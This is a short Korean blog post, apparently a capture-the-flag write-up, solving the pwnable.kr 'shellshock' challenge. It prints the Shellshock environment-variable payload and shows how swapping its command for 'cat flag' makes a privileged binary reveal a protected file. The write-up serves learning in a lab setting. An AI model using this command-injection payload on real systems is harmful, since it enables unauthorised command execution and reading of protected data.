본문 바로가기
Wargame/pwnable.kr

pwnable.kr shellshock

by morae23 2019. 2. 1.

ssh shellshock@pwnable.kr -p2222


먼저 아래와 같은 파일을 볼 수 있다.



코드는 아래와 같다.



문제 이름에서도 알 수 있듯 이번 문제는 shellshock 취약점을 이용하여 풀 수 있다.


shellshock와 관련해서는 검색해보면 자세한 설명과 관련 CVE 등을 볼 수 있다.


​env x='() { :;}; echo hello' bash -c "echo world"

여기서 다시 shellshock.c를 보면 system("/home/shellshock/bash -c 'echo shock_me'")가 있다.



따라서 

env x='() { :;}; echo hello' ./shellshock

를 해준다.



여기서 echo hello 부분을 cat flag로 바꾸면 플래그를 얻을 수 있다.



'Wargame > pwnable.kr' 카테고리의 다른 글

pwnable.kr blukat  (0) 2019.02.11
pwnable.kr leg  (0) 2019.02.11
pwnable.kr mistake  (0) 2019.02.01
pwnable.kr lotto  (0) 2019.02.01
pwnable.kr blackjack  (0) 2019.02.01

댓글